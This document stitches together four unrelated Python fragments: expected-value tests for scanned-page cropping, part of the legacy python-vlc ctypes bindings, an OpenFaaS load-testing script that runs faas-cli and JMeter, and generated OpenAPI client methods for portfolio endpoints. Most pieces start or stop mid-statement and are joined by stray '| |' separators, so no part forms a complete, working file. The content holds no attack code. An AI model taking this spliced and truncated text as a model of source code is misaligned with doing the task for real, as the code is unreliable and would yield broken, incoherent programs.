ConstString.image_crop(2, "y2"): ("range", 3359, 3363),
ConstString.image_dpi(1): ("difference", 300, 0.0000001),
ConstString.image_border(1, 1): ("range", 116, 135),
ConstString.image_border(1, 2): ("range", 147, 168),
ConstString.image_border(1, 3): ("range", 221, 225),
ConstString.image_border(1, 4): ("range", 221, 225),
ConstString.image_dpi(2): ("difference", 300, 0.0000001),
ConstString.image_border(2, 1): ("range", 95, 142),
ConstString.image_border(2, 2): ("range", 140, 186),
ConstString.image_border(2, 3): ("range", 218, 224),
ConstString.image_border(2, 4): ("range", 218, 224),
},
)
def test_crop_too_few_png() -> None:
"""Improve detection of black area to ignored
and that are closed to the edge.
"""
MockDisableSeparatePage(MAX_VAL, FUZZING).treat_file(
get_absolute_from_current_path(__file__, "crop_too_few.png"),
{
ConstString.separation_double_page_angle(): (
"range",
Angle.deg(89.22),
Angle.deg(89.62),
),
ConstString.separation_double_page_y(): ("range", 2508, 2515),
ConstString.page_rotation(1): (
"range",
Angle.deg(-0.81),
Angle.deg(-0.49),
),
ConstString.page_rotation(2): (
"range",
Angle.deg(-0.16),
| |
return libvlc_media_get_meta(self, e_meta, e)
if hasattr(dll, 'libvlc_media_get_state'):
def get_state(self):
"""Get current state of media descriptor object. Possible media states
are defined in libvlc_structures.c ( libvlc_NothingSpecial=0,
libvlc_Opening, libvlc_Buffering, libvlc_Playing, libvlc_Paused,
libvlc_Stopped, libvlc_Ended,
libvlc_Error).
See libvlc_state_t
@return: state of media descriptor object
"""
e=VLCException()
return libvlc_media_get_state(self, e)
if hasattr(dll, 'libvlc_media_subitems'):
def subitems(self):
"""Get subitems of media descriptor object. This will increment
the reference count of supplied media descriptor object. Use
libvlc_media_list_release() to decrement the reference counting.
@return: list of media descriptor subitems or NULL
"""
e=VLCException()
return libvlc_media_subitems(self, e)
if hasattr(dll, 'libvlc_media_event_manager'):
def event_manager(self):
"""Get event manager from media descriptor object.
NOTE: this function doesn't increment reference counting.
@return: event manager object
"""
e=VLCException()
return libvlc_media_event_manager(self, e)
if hasattr(dll, 'libvlc_media_get_duration'):
def get_duration(self):
"""Get duration of media descriptor object item.
@return: duration of media item
"""
e=VLCException()
return libvlc_media_get_duration(self, e)
if hasattr(dll, 'libvlc_media_is_preparsed'):
def is_preparsed(self):
"""Get preparsed status for media descriptor object.
@return: true if media object has been preparsed otherwise it returns false
"""
e=VLCException()
return libvlc_media_is_preparsed(self, e)
if hasattr(dll, 'libvlc_media_set_user_data'):
def set_user_data(self, p_new_user_data):
"""Sets media descriptor's user_data. user_data is specialized data
accessed by the host application, VLC.framework uses it as a pointer to
an native object that references a libvlc_media_t pointer
@param p_new_user_data: pointer to user data
"""
e=VLCException()
return libvlc_media_set_user_data(self, p_new_user_data, e)
if hasattr(dll, 'libvlc_media_get_user_data'):
def get_user_data(self):
"""Get media descriptor's user_data. user_data is specialized data
accessed by the host application, VLC.framework uses it as a pointer to
an native object that references a libvlc_media_t pointer
"""
e=VLCException()
return libvlc_media_get_user_data(self, e)
if hasattr(dll, 'libvlc_media_player_new_from_media'):
def player_new_from_media(self):
"""Create a Media Player object from a Media
"""
e=VLCException()
return libvlc_media_player_new_from_media(self, e)
class MediaControl(object):
"""Create a new MediaControl instance
It may take as parameter either:
- a string
- a list of strings as first parameters
- the parameters given as the constructor parameters (must be strings)
- a vlc.Instance
"""
@staticmethod
def from_param(arg):
'''(INTERNAL) ctypes parameter conversion method.
'''
return arg._as_parameter_
def __new__(cls, *p):
if p and p[0] == 0:
return None
elif p and isinstance(p[0], (int, long)):
# instance creation from ctypes
o=object.__new__(cls)
o._as_parameter_=ctypes.c_void_p(p[0])
return o
elif len(p) == 1 and isinstance(p[0], basestring):
# Only 1 string parameter: should be a parameter line
p=p[0].split(' ')
elif len(p) == 1 and isinstance(p[0], (tuple, list)):
p=p[0]
if p and isinstance(p[0], Instance):
e=MediaControlException()
return mediacontrol_new_from_instance(p[0], e)
else:
if not p and detected_plugin_path is not None:
# No parameters passed. Under win32 and MacOS, specify
# the detected_plugin_path if present.
p=[ 'vlc', '--plugin-path='+ detected_plugin_path ]
e=MediaControlException()
return mediacontrol_new(len(p), p, e)
def get_media_position(self, origin=PositionOrigin.AbsolutePosition, key=PositionKey.MediaTime):
e=MediaControlException()
p=mediacontrol_get_media_position(self, origin, key, e)
if p:
return p.contents
else:
return None
def set_media_position(self, pos):
"""Set the media position.
@param pos: a MediaControlPosition or an integer (in ms)
"""
if not isinstance(pos, MediaControlPosition):
pos=MediaControlPosition(long(pos))
e=MediaControlException()
mediacontrol_set_media_position(self, pos, e)
def start(self, pos=0):
"""Start the player at the given position.
@param pos: a MediaControlPosition or an integer (in ms)
"""
if not isinstance(pos, MediaControlPosition):
pos=MediaControlPosition(long(pos))
e=MediaControlException()
mediacontrol_start(self, pos, e)
def snapshot(self, pos=0):
"""Take a snapshot.
Note: the position parameter is not properly implemented. For
the moment, the only valid position is the 0-relative position
(i.e. the current position).
@param pos: a MediaControlPosition or an integer (in ms)
"""
if not isinstance(pos, MediaControlPosition):
pos=MediaControlPosition(long(pos))
e=MediaControlException()
p=mediacontrol_snapshot(self, pos, e)
if p:
snap=p.contents
# FIXME: there is a bug in the current mediacontrol_snapshot
# implementation, which sets an incorrect date.
# Workaround here:
snap.date=self.get_media_position().value
return snap
else:
return None
def display_text(self, message='', begin=0, end=1000):
"""Display a caption between begin and end positions.
@param message: the caption to display
@param begin: the begin position
@param end: the end position
"""
if not isinstance(begin, MediaControlPosition):
begin=self.value2position(begin)
if not isinstance(end, MediaControlPosition):
end=self.value2position(end)
e=MediaControlException()
mediacontrol_display_text(self, message, begin, end, e)
def get_stream_information(self, key=PositionKey.MediaTime):
"""Return information about the stream.
"""
e=MediaControlException()
return mediacontrol_get_stream_information(self, key, e).contents
if hasattr(dll, 'mediacontrol_get_libvlc_instance'):
def get_instance(self):
"""Get the associated libvlc instance
@return: a libvlc instance
"""
return mediacontrol_get_libvlc_instance(self)
if hasattr(dll, 'mediacontrol_get_media_player'):
def get_media_player(self):
"""Get the associated libvlc_media_player
@return: a libvlc_media_player_t instance
"""
return mediacontrol_get_media_player(self)
if hasattr(dll, 'mediacontrol_pause'):
def pause(self):
"""Pause the movie at a given position
"""
e=MediaControlException()
return mediacontrol_pause(self, e)
if hasattr(dll, 'mediacontrol_resume'):
def resume(self):
"""Resume the movie at a given position
"""
e=MediaControlException()
return mediacontrol_resume(self, e)
if hasattr(dll, 'mediacontrol_stop'):
def stop(self):
"""Stop the movie at a given position
"""
e=MediaControlException()
return mediacontrol_stop(self, e)
if hasattr(dll, 'mediacontrol_exit'):
def exit(self):
"""Exit the player
"""
return mediacontrol_exit(self)
if hasattr(dll, 'mediacontrol_set_mrl'):
def set_mrl(self, psz_file):
"""Set the MRL to be played.
@param psz_file: the MRL
"""
e=MediaControlException()
return mediacontrol_set_mrl(self, psz_file, e)
if hasattr(dll, 'mediacontrol_get_mrl'):
def get_mrl(self):
"""Get the MRL to be played.
"""
e=MediaControlException()
return mediacontrol_get_mrl(self, e)
if hasattr(dll, 'mediacontrol_sound_get_volume'):
def sound_get_volume(self):
"""Get the current audio level, normalized in [0..100]
@return: the volume
"""
e=MediaControlException()
return mediacontrol_sound_get_volume(self, e)
if hasattr(dll, 'mediacontrol_sound_set_volume'):
def sound_set_volume(self, volume):
"""Set the audio level
@param volume: the volume (normalized in [0..100])
"""
e=MediaControlException()
return mediacontrol_sound_set_volume(self, volume, e)
if hasattr(dll, 'mediacontrol_set_visual'):
def set_visual(self, visual_id):
"""Set the video output window
@param visual_id: the Xid or HWND, depending on the platform
"""
e=MediaControlException()
return mediacontrol_set_visual(self, visual_id, e)
if hasattr(dll, 'mediacontrol_get_rate'):
def get_rate(self):
"""Get the current playing rate, in percent
@return: the rate
"""
e=MediaControlException()
return mediacontrol_get_rate(self, e)
if hasattr(dll, 'mediacontrol_set_rate'):
def set_rate(self, rate):
"""Set the playing rate, in percent
@param rate: the desired rate
"""
e=MediaControlException()
return mediacontrol_set_rate(self, rate, e)
if hasattr(dll, 'mediacontrol_get_fullscreen'):
def get_fullscreen(self):
"""Get current fullscreen status
@return: the fullscreen status
"""
e=MediaControlException()
return mediacontrol_get_fullscreen(self, e)
if hasattr(dll, 'mediacontrol_set_fullscreen'):
def set_fullscreen(self, b_fullscreen):
"""Set fullscreen status
@param b_fullscreen: the desired status
"""
e=MediaControlException()
return mediacontrol_set_fullscreen(self, b_fullscreen, e)
class MediaDiscoverer(object):
def __new__(cls, pointer=None):
'''Internal method used for instanciating wrappers from ctypes.
'''
if pointer is None:
raise Exception("Internal method. Surely this class cannot be instanciated by itself.")
if pointer == 0:
return None
else:
o=object.__new__(cls)
o._as_parameter_=ctypes.c_void_p(pointer)
return o
@staticmethod
def from_param(arg):
'''(INTERNAL) ctypes parameter conversion method.
'''
return arg._as_parameter_
if hasattr(dll, 'libvlc_media_discoverer_release'):
def release(self):
"""Release media discover object. If the reference count reaches 0, then
the object will be released.
"""
return libvlc_media_discoverer_release(self)
if hasattr(dll, 'libvlc_media_discoverer_localized_name'):
def localized_name(self):
"""Get media service discover object its localized name.
@return: localized name
"""
return libvlc_media_discoverer_localized_name(self)
if hasattr(dll, 'libvlc_media_discoverer_media_list'):
def media_list(self):
"""Get media service discover media list.
@return: list of media items
"""
return libvlc_media_discoverer_media_list(self)
if hasattr(dll, 'libvlc_media_discoverer_event_manager'):
def event_manager(self):
"""Get event manager from media service discover object.
@return: event manager object.
"""
return libvlc_media_discoverer_event_manager(self)
if hasattr(dll, 'libvlc_media_discoverer_is_running'):
def is_running(self):
"""Query if media service discover object is running.
@return: true if running, false if not
"""
return libvlc_media_discoverer_is_running(self)
class MediaLibrary(object):
def __new__(cls, pointer=None):
'''Internal method used for instanciating wrappers from ctypes.
'''
if pointer is None:
raise Exception("Internal method. Surely this class cannot be instanciated by itself.")
if pointer == 0:
return None
else:
o=object.__new__(cls)
o._as_parameter_=ctypes.c_void_p(pointer)
return o
@staticmethod
def from_param(arg):
'''(INTERNAL) ctypes parameter conversion method.
'''
return arg._as_parameter_
if hasattr(dll, 'libvlc_media_library_release'):
def release(self):
"""Release media library object. This functions decrements the
reference count of the media library object. If it reaches 0,
then the object will be released.
"""
return libvlc_media_library_release(self)
if hasattr(dll, 'libvlc_media_library_retain'):
def retain(self):
"""Retain a reference to a media library object. This function will
increment the reference counting for this object. Use
libvlc_media_library_release() to decrement the reference count.
"""
return libvlc_media_library_retain(self)
if hasattr(dll, 'libvlc_media_library_load'):
def load(self):
"""Load media library.
"""
e=VLCException()
return libvlc_media_library_load(self, e)
if hasattr(dll, 'libvlc_media_library_save'):
def save(self):
"""Save media library.
"""
e=VLCException()
return libvlc_media_library_save(self, e)
if hasattr(dll, 'libvlc_media_library_media_list'):
def media_list(self):
"""Get media library subitems.
@return: media list subitems
"""
e=VLCException()
return libvlc_media_library_media_list(self, e)
class MediaList(object):
def __new__(cls, pointer=None):
'''Internal method used for instanciating wrappers from ctypes.
'''
if pointer is None:
raise Exception("Internal method. Surely this class cannot be instanciated by itself.")
if pointer == 0:
return None
else:
o=object.__new__(cls)
o._as_parameter_=ctypes.c_void_p(pointer)
return o
@staticmethod
def from_param(arg):
'''(INTERNAL) ctypes parameter conversion method.
'''
return arg._as_parameter_
if hasattr(dll, 'libvlc_media_list_release'):
def release(self):
"""Release media list created with libvlc_media_list_new().
"""
return libvlc_media_list_release(self)
if hasattr(dll, 'libvlc_media_list_retain'):
def retain(self):
"""Retain reference to a media list
"""
return libvlc_media_list_retain(self)
if hasattr(dll, 'libvlc_media_list_set_media'):
def set_media(self, p_mi):
"""Associate media instance with this media list instance.
If another media instance was | |
<filename>faas_exp.py
import os
import sys
import time
import datetime
import csv
import json
import logging
import subprocess
import io
from statistics import median
from pathlib import Path
import click
import requests
import pandas as pd
import numpy as np
from scipy.stats import wilcoxon as wilcoxon_cal
from scipy.stats import mannwhitneyu
from jinja2 import Environment, FileSystemLoader
from config import Config
from figures import plot_bar_figure
from functions import (
SAMPLE,
FUNCTIONS,
FRAMEWORKS,
CASES,
SUMMARY,
MEDIAN_ACTION,
SUMMARY_ACTION,
WILCOXON_ACTION,
WARMS
)
# Prepare Config
config = Config()
# Prepare logger
logger = logging.getLogger(__name__)
# Set the logger level
logger.setLevel(logging.DEBUG)
# Create handlers
handler = logging.StreamHandler(sys.stdout)
handler.setLevel(logging.DEBUG)
# Create formatter
formatter = logging.Formatter(
'%(asctime)s - %(name)s - %(levelname)s - %(message)s'
)
# Set formatter
handler.setFormatter(formatter)
# Add handler to the logger
logger.addHandler(handler)
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
JMETER_DIR = os.path.join(BASE_DIR, 'jmeter')
RESULTS_DIR = os.path.join(BASE_DIR, 'results')
FIGURES_DIR = os.path.join(BASE_DIR, 'figures')
SUMMARY_DIR = os.path.join(BASE_DIR, 'summary')
WILCOXON_DIR = os.path.join(BASE_DIR, 'wilcoxon')
CASES_DESC = {
'replica1': '1',
'replica10': '10',
'replica20': '20',
'user_5': '5',
'user_10': '10',
'user_20': '20',
'user_50': '50'
}
def _get_iqr_limits(_dataset):
q1 = np.percentile(_dataset, 25, interpolation='midpoint')
q3 = np.percentile(_dataset, 75, interpolation='midpoint')
iqr = q3 - q1
print('IQR is {0}'.format(iqr))
if iqr == 0.0:
return 0, 0
lower_limit = q1 - (1.5 * iqr)
upper_limit = q3 + (1.5 * iqr)
print('Lower Limit is {0}'.format(lower_limit))
print('Upper Limit is {0}'.format(upper_limit))
return lower_limit, upper_limit
def _remove_outliers_from_dataset(_dataset):
_updated_dataset = []
outliers = []
lower_limit, upper_limit = _get_iqr_limits(_dataset)
if lower_limit == 0 and upper_limit == 0:
return _dataset
for x in _dataset:
if lower_limit < x < upper_limit:
_updated_dataset.append(x)
else:
outliers.append(x)
if not _updated_dataset:
print('All datasets are outliers :P:P:P')
return _updated_dataset
def _is_cold_start_enabled(function):
return True if \
function.get('inactivity_duration') \
and function.get('chunks_number') else False
def _execute_command(command, cwd=None, ignore_log=False):
subprocess_args = {
'args': command.split(),
'stdout': subprocess.PIPE,
'stderr': subprocess.PIPE,
'cwd': cwd
}
if not ignore_log:
logger.debug('Running command {0}.'.format(command))
process = subprocess.Popen(**subprocess_args)
output, error = process.communicate()
if not ignore_log:
logger.info('command: {0} '.format(repr(command)))
logger.info('output: {0} '.format(output.decode('utf-8')))
logger.error('error: {0} '.format(error.decode('utf-8')))
logger.info('process.returncode: {0} '.format(process.returncode))
if process.returncode:
return False
return output
def _creat_dir(dir_path):
if not os.path.isdir(dir_path):
os.mkdir(dir_path)
logger.info('Directory {} created successfully'.format(dir_path))
else:
logger.info('Directory {} is already existed'.format(dir_path))
def _create_nested_dir(dir_path):
p = Path(dir_path)
p.mkdir(parents=True, exist_ok=True)
logger.info('Directory {} created successfully'.format(dir_path))
def _clean_properties_file():
os.remove(os.path.join(JMETER_DIR, 'properties/config.properties'))
def _get_experiment_config():
return config['experiment']
def _get_function_endpoint(function):
experiment = _get_experiment_config()
func = {
'http_method': function['api']['http_method']
}
uri_path = function['api']['uri']
if function['api'].get('param'):
param = function['api']['param'].setdefault('min', '1')
uri_path = '{path}?param={param}'.format(
path=uri_path, param=param)
endpoint = 'http://{server}:{port}/{uri_path}'.format(
server=experiment['server'],
port=experiment['port'],
uri_path=uri_path
)
func['endpoint'] = endpoint
return func
def _get_dependency_function(function_name):
for function in config['functions']:
if function['name'] == function_name:
return function
return None
def _wait_function_status_code(
endpoint,
http_method,
stop_status,
check_status,
data=None):
ready = False
while not ready:
attr = {}
attr['headers'] = {'content-type': 'text/plain'}
http_call = getattr(requests, http_method.lower())
if data:
attr['data'] = data
response = http_call(endpoint, **attr)
status_code = response.status_code
if status_code in check_status:
logger.info(
'Function endpoint'
' {0} is on {1}'.format(
endpoint, status_code))
time.sleep(5)
continue
elif status_code in stop_status:
ready = True
logger.info(
'Function endpoint {0} is on {1}'
''.format(endpoint, status_code))
break
elif status_code == 502:
logger.warning(
'Bad Gateway, something went wrong try again later')
time.sleep(10)
else:
raise Exception(
'Function {0} return'
' status code {1}'.format(
endpoint, status_code)
)
return ready
def _generate_file_from_template(context, template_path, generated_path):
template_name = template_path.rsplit('/', 1)[1]
template_path = template_path.rsplit('/', 1)[0]
env = Environment(
autoescape=False,
trim_blocks=False,
loader=FileSystemLoader(template_path)
)
content = env.get_template(template_name).render(context)
with open(generated_path, 'w') as f:
f.write(content)
def _generate_jmeter_properties_file(function,
number_of_users,
number_of_requests=None):
template_path = os.path.join(
JMETER_DIR, 'properties/config.properties.j2'
)
experiment = _get_experiment_config()
if not number_of_requests:
number_of_requests = experiment['number_of_requests']
context = {
'number_of_users': number_of_users,
'loop_count': int(number_of_requests/number_of_users),
'server': experiment['server'],
'port': experiment['port'],
'http_method': function['api']['http_method'],
'path': function['api']['uri']
}
if function.get('data'):
context['data'] = function['data']
prop_file = os.path.join(JMETER_DIR, 'properties/config.properties')
_generate_file_from_template(context, template_path, prop_file)
return prop_file
def _generate_jmeter_jmx_file(function):
# This will passed to the jmx file if no param passed
template_path = os.path.join(
JMETER_DIR, 'jmx/faas.jmx.j2'
)
path = '${__P(path)}'
if function['api'].get('param'):
param = function['api']['param']
min_param = param.setdefault('min', '1')
max_param = param.setdefault('max', '3')
path = '{0}?param=${{__Random({1},{2})}}' \
''.format(path,
min_param,
max_param)
context = {
'path': path
}
jmx_file = os.path.join(JMETER_DIR, 'jmx/faas.jmx')
_generate_file_from_template(context, template_path, jmx_file)
return jmx_file
def _deploy_function(function_path, labels=None, env=None):
labels_to_add = ''
envs_to_add = ''
labels = labels or []
env = env or {}
for label in labels:
labels_to_add += ' --label {0}'.format(label)
command = 'faas-cli deploy -yaml {0}'.format(function_path)
if labels_to_add:
command = '{command}{labels}'.format(
command=command, labels=labels_to_add
)
for key, value in env.items():
envs_to_add += ' --env {key}={value}'.format(key=key, value=value)
if envs_to_add:
command = '{command}{envs}'.format(
command=command, envs=envs_to_add
)
logger.info(command)
output = _execute_command(command, cwd=BASE_DIR)
if not output:
raise Exception(
'Error when trying to deploy function {0}'.format(function_path)
)
logger.info('Deploy function {0} successfully'.format(function_path))
def _remove_function(name):
command = 'faas-cli remove {}'.format(name)
logger.info(command)
output = _execute_command(command)
if not output:
raise Exception(
'Error when trying to remove function {0}'.format(name)
)
logger.info('Remove function {0} successfully'.format(name))
def _run_load_test(function, properties_path, result_path):
result_path = os.path.join(result_path, 'results')
summary_result = os.path.join(os.path.dirname(result_path), 'summary.jtl')
jmx_path = _generate_jmeter_jmx_file(function)
command = 'jmeter -n -t {jmx_path}' \
' -p {properties_path}' \
' -l {summary_result} -e -o {result_path}' \
''.format(jmx_path=jmx_path,
properties_path=properties_path,
summary_result=summary_result,
result_path=result_path)
logger.info('Running {0}'.format(command))
output = _execute_command(command)
if not output:
raise Exception(
'Failure while trying to run {}'.format(command)
)
def _execute_with_auto_scaling(function_dir,
function,
load_type,
number_of_users):
function_name = function['name']
logger.info(
'Start running {0} '
'auto scaling test cases for {1}'
''.format(load_type, function_name)
)
load_type_path = os.path.join(function_dir, 'autoscaling')
_creat_dir(load_type_path)
# Deploy function
_deploy_function(function['yaml_path'], env=function.get('environment'))
endpoint = _get_function_endpoint(function)
_wait_function_status_code(
endpoint['endpoint'],
endpoint['http_method'],
stop_status=[200],
check_status=[404],
data=function.get('data')
)
experiment = _get_experiment_config()
number_of_runs = experiment['number_of_runs']
for user in number_of_users:
user_path = os.path.join(
load_type_path, 'user_{}'.format(user)
)
_creat_dir(user_path)
# Prepare jmeter configuration
prop_file = _generate_jmeter_properties_file(function, user)
logger.info('This is the prop file {}'.format(prop_file))
logger.info('Testing with number of users: {}'.format(user))
for run_number in range(1, number_of_runs + 1):
logger.info('Testing run # {}'.format(run_number))
run_path = os.path.join(user_path, str(run_number))
_creat_dir(run_path)
if _is_cold_start_enabled(function):
chunks_number = int(function['chunks_number'])
chunk_requests = int(
experiment['number_of_requests'] / chunks_number
)
for chunk in range(int(chunks_number / 2)):
for index in range(2):
chunk_name = "warm_{0}" \
if index % 2 == 0 else "cold_{0}"
chunk_name = chunk_name.format(chunk)
chunk_path = os.path.join(run_path, chunk_name)
_creat_dir(chunk_path)
# Only wait when the chunk_name is cold
if 'cold' in chunk_name:
# Wait before sending any requests
delay = int(function['inactivity_duration']) + 1
logger.info(
'Wait Cold start time {0}m'.format(delay)
)
time.sleep(delay * 60)
# Override the prop file
prop_file = _generate_jmeter_properties_file(
function,
user,
number_of_requests=chunk_requests
)
_run_load_test(function, prop_file, chunk_path)
else:
_run_load_test(function, prop_file, run_path)
# Before move to the next run wait a little bit
delay = experiment['delay_between_runs']
logger.info(
'Wait {0} minutes before run next run'.format(delay)
)
time.sleep(int(delay) * 60)
_remove_function(function_name)
_wait_function_status_code(
endpoint['endpoint'],
endpoint['http_method'],
stop_status=[404],
check_status=[200, 500, 502],
data=function.get('data')
)
_clean_properties_file()
def _execute_without_auto_scaling(function_dir,
function,
load_type):
function_name = function['name']
logger.info(
'Start running {0} '
' without auto scaling '
'test cases for {1}'
''.format(load_type, function_name)
)
# This is for number of users we should have
number_of_users = 1
if load_type == 'parallel':
number_of_users = 15
noautoscaling_path = os.path.join(function_dir, 'noautoscaling')
_creat_dir(noautoscaling_path)
experiment = _get_experiment_config()
number_of_runs = experiment['number_of_runs']
replicas = experiment['replicas']
# Prepare jmeter configuration
for replica in replicas:
replica_path = os.path.join(
noautoscaling_path, 'replica{}'.format(replica)
)
_creat_dir(replica_path)
# Deploy function
_deploy_function(
function['yaml_path'],
labels=['com.openfaas.scale.max={}'.format(replica),
'com.openfaas.scale.min={}'.format(replica)],
env=function.get('environment')
)
endpoint = _get_function_endpoint(function)
_wait_function_status_code(
endpoint['endpoint'],
endpoint['http_method'],
stop_status=[200],
check_status=[404],
data=function.get('data')
)
prop_file = _generate_jmeter_properties_file(function, number_of_users)
# Wait for replica to init
time.sleep(5)
logger.info('Testing with replica: {}'.format(replica))
for run_number in range(1, number_of_runs + 1):
logger.info('Testing run # {}'.format(run_number))
run_path = os.path.join(replica_path, str(run_number))
_creat_dir(run_path)
if _is_cold_start_enabled(function):
chunks_number = int(function['chunks_number'])
chunk_requests = int(
experiment['number_of_requests'] / chunks_number
)
for chunk in range(int(chunks_number / 2)):
for index in range(2):
chunk_name = "warm_{0}" \
if index % 2 == 0 else "cold_{0}"
chunk_name = chunk_name.format(chunk)
chunk_path = os.path.join(run_path, chunk_name)
_creat_dir(chunk_path)
# Only wait when the chunk_name is cold
if 'cold' in chunk_name:
# Wait before sending any requests
delay = int(function['inactivity_duration']) + 1
logger.info(
'Wait Cold start time {0}m'.format(delay)
)
time.sleep(delay * 60)
# Override the prop file
prop_file = _generate_jmeter_properties_file(
function,
number_of_users,
number_of_requests=chunk_requests
)
_run_load_test(function, prop_file, chunk_path)
else:
_run_load_test(function, prop_file, run_path)
delay = experiment['delay_between_runs']
logger.info('Wait {0} minutes before run next run'.format(delay))
time.sleep(int(delay) * 60)
_remove_function(function_name)
# wait before checking if the function removed or not
# Check if the function already removed or not
_wait_function_status_code(
endpoint['endpoint'],
endpoint['http_method'],
stop_status=[404],
check_status=[200, 500, 502],
data=function.get('data')
)
_clean_properties_file()
def _execute_sequential(function_dir, function):
logger.info('*************** Start sequential test cases ***************')
sequential_path = os.path.join(function_dir, 'sequential')
_creat_dir(sequential_path)
_execute_without_auto_scaling(
sequential_path,
function,
'sequential'
)
logger.info(
'*************** Finished sequential test cases ***************\n'
)
def _execute_parallel(function_dir, function):
logger.info('*************** Start parallel test cases ***************')
parallel_path = os.path.join(function_dir, 'parallel')
concurrency = _get_experiment_config()['concurrency']
_creat_dir(parallel_path)
_execute_with_auto_scaling(
parallel_path,
function,
'parallel',
number_of_users=concurrency
)
| |
True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
ApplyResult[InlineResponse2005]
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=True, async_req=True)
return self.portfolio_name_list_get_endpoint.call_with_http_info(**kwargs)
def portfolio_name_list_get_with_http_info_async(
self,
**kwargs
) -> "ApplyResult[typing.Tuple[InlineResponse2005, int, typing.MutableMapping]]":
"""List of portfolios. # noqa: E501
List of portfolios. # noqa: E501
This method makes a asynchronous HTTP request. Returns http data, http status and headers, wrapped in ApplyResult
Keyword Args:
attributes ([str]): Limit the attributes returned in the response to the specified set.. [optional]
sort ([str]): Sortable attributes. The sort order is ascending unless it is prefixed with a minus sign, in which case it is descending. A list of at most 2 (possibly prefixed) attribute name(s) is allowed.. [optional] if omitted the server will use the default value of ["name"]
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
ApplyResult[(InlineResponse2005, int, typing.Dict)]
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=False, async_req=True)
return self.portfolio_name_list_get_endpoint.call_with_http_info(**kwargs)
def portfolio_position_list_get(
self,
id,
**kwargs
) -> InlineResponse2006:
"""List all positions of a portfolio. # noqa: E501
List all positions of a portfolio. # noqa: E501
This method makes a synchronous HTTP request. Returns the http data only
Args:
id (str): Identifier of the portfolio.
Keyword Args:
attributes ([str]): Limit the attributes returned in the response to the specified set.. [optional]
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
InlineResponse2006
Response Object
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=True, async_req=False)
kwargs['id'] = \
id
return self.portfolio_position_list_get_endpoint.call_with_http_info(**kwargs)
def portfolio_position_list_get_with_http_info(
self,
id,
**kwargs
) -> typing.Tuple[InlineResponse2006, int, typing.MutableMapping]:
"""List all positions of a portfolio. # noqa: E501
List all positions of a portfolio. # noqa: E501
This method makes a synchronous HTTP request. Returns http data, http status and headers
Args:
id (str): Identifier of the portfolio.
Keyword Args:
attributes ([str]): Limit the attributes returned in the response to the specified set.. [optional]
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
InlineResponse2006
Response Object
int
Http Status Code
dict
Dictionary of the response headers
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=False, async_req=False)
kwargs['id'] = \
id
return self.portfolio_position_list_get_endpoint.call_with_http_info(**kwargs)
def portfolio_position_list_get_async(
self,
id,
**kwargs
) -> "ApplyResult[InlineResponse2006]":
"""List all positions of a portfolio. # noqa: E501
List all positions of a portfolio. # noqa: E501
This method makes a asynchronous HTTP request. Returns the http data, wrapped in ApplyResult
Args:
id (str): Identifier of the portfolio.
Keyword Args:
attributes ([str]): Limit the attributes returned in the response to the specified set.. [optional]
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
ApplyResult[InlineResponse2006]
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=True, async_req=True)
kwargs['id'] = \
id
return self.portfolio_position_list_get_endpoint.call_with_http_info(**kwargs)
def portfolio_position_list_get_with_http_info_async(
self,
id,
**kwargs
